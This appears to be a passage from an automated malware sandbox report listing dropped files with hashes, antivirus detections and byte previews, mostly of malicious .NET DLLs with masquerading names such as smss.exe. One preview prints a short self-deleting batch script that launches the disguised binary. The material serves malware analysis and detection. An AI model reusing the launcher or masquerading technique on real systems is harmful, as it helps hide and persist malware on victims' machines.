                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):25
                                                                                      Entropy (8bit):4.243856189774723
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CNchvB:CkB
                                                                                      MD5:2964126A61C3C68B61C9D79A07F60952
                                                                                      SHA1:5A362C0FE0C32B856D1D7B5100EA7E3A70CE165E
                                                                                      SHA-256:E57342202AC85B71D54AAE7D9267ABAC47BF7681949877F1CD27C11F90C488A7
                                                                                      SHA-512:03EE543C356F563DC5B7308805F7D17023F42D16E83D8953019F6B4A8C425E1B9C9FDD4795719D97B22A2B3F6B2463BE44A5F1E5DCB05EE88CEA3B8AE16043CD
                                                                                      Malicious:false
                                                                                      Preview:txc3oOB6ybnI76OrckpLdpLM9
                                                                                      Process:C:\Program Files\Windows NT\smss.exe
                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):211
                                                                                      Entropy (8bit):5.146059111986477
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:hCijTg3Nou1SV+DEi4/ZmvKOZG1qLTwi23fvd:HTg9uYDEi4/cwZnd
                                                                                      MD5:F07BCFB40F3F4C0FAF2621EDEB666094
                                                                                      SHA1:00CE57A509AE07D6762E2830689AAC37E0668788
                                                                                      SHA-256:853FF7FBC5ECE3307D232E5EEE5CBF16D6B8E1FE65B4C30B4BB2D54D8F17F834
                                                                                      SHA-512:F35ECF0118638BBEA0AB454ABFC27BD520D0BF9BD65BA04B04CE1BBB1DB8903D77D0B4696DE73D20BDE13FD64D1178785806E82DF18C726C55C10DAE4C35BD68
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Windows NT\smss.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\fDDEz4CMJh.bat"
                                                                                      Process:C:\Program Files\Windows NT\smss.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):25
                                                                                      Entropy (8bit):4.133660689688186
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:C2CIB/p0pU:9kU
                                                                                      MD5:9F3DCC4828AF3B4B444F40162348ADEA
                                                                                      SHA1:CBC0CCDD069C95D303B4BDB4B7DE3281EC5E9E23
                                                                                      SHA-256:6E90C9F188A879A660C59D0818F06D5F7E020D2A318CC8AB87023C292C9DB761
                                                                                      SHA-512:4A5FCC563008FE37B42E3FC164CCB370388CE9EF8C2EEE898B0A7C1E9F115B46E9436BE2CF90D7F5C3B0236E83714B5E763FF5BA32E59E53017EBEC39F85D973
                                                                                      Malicious:false
                                                                                      Preview:nN9EFtkCdc0qtdasLdLork7n1
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):69632
                                                                                      Entropy (8bit):5.932541123129161
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: SearchIndexer.exe, Detection: malicious, Browse
                                                                                      • Filename: fatality.exe, Detection: malicious, Browse
                                                                                      • Filename: OneDriveStandaloneUpdater.exe, Detection: malicious, Browse
                                                                                      • Filename: 85D5ktqjpd.exe, Detection: malicious, Browse
                                                                                      • Filename: VIyu4dC9CU.exe, Detection: malicious, Browse
                                                                                      • Filename: top.exe, Detection: malicious, Browse
                                                                                      • Filename: DC86.exe, Detection: malicious, Browse
                                                                                      • Filename: WinPerfcommon.exe, Detection: malicious, Browse
                                                                                      • Filename: Udzp7lL5ns.exe, Detection: malicious, Browse
                                                                                      • Filename: loader.exe, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                      Process:C:\Program Files\Windows NT\smss.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):69632
                                                                                      Entropy (8bit):5.932541123129161
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                      MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                      SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                      SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                      SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                      Process:C:\Program Files\Windows NT\smss.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):32256
                                                                                      Entropy (8bit):5.631194486392901
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):33792
                                                                                      Entropy (8bit):5.541771649974822
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Windows NT\smss.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):85504
                                                                                      Entropy (8bit):5.8769270258874755
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                      MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                      SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                      SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                      SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):70144
                                                                                      Entropy (8bit):5.909536568846014
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):23552
                                                                                      Entropy (8bit):5.519109060441589
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                      MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                      SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                      SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                      SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Windows NT\smss.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):70144
                                                                                      Entropy (8bit):5.909536568846014
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):32256
                                                                                      Entropy (8bit):5.631194486392901
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):40448
                                                                                      Entropy (8bit):5.7028690200758465
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                      MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                      SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                      SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                      SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):46592
                                                                                      Entropy (8bit):5.870612048031897
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):33792
                                                                                      Entropy (8bit):5.541771649974822
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Windows NT\smss.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):33792
                                                                                      Entropy (8bit):5.541771649974822
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):40448
                                                                                      Entropy (8bit):5.7028690200758465
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                      MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                      SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                      SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                      SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):294912
                                                                                      Entropy (8bit):6.010605469502259
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 11%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                                      Process:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):70144
                                                                                      Entropy (8bit):5.909536568846014
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):32256
                                                                                      Entropy (8bit):5.631194486392901
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
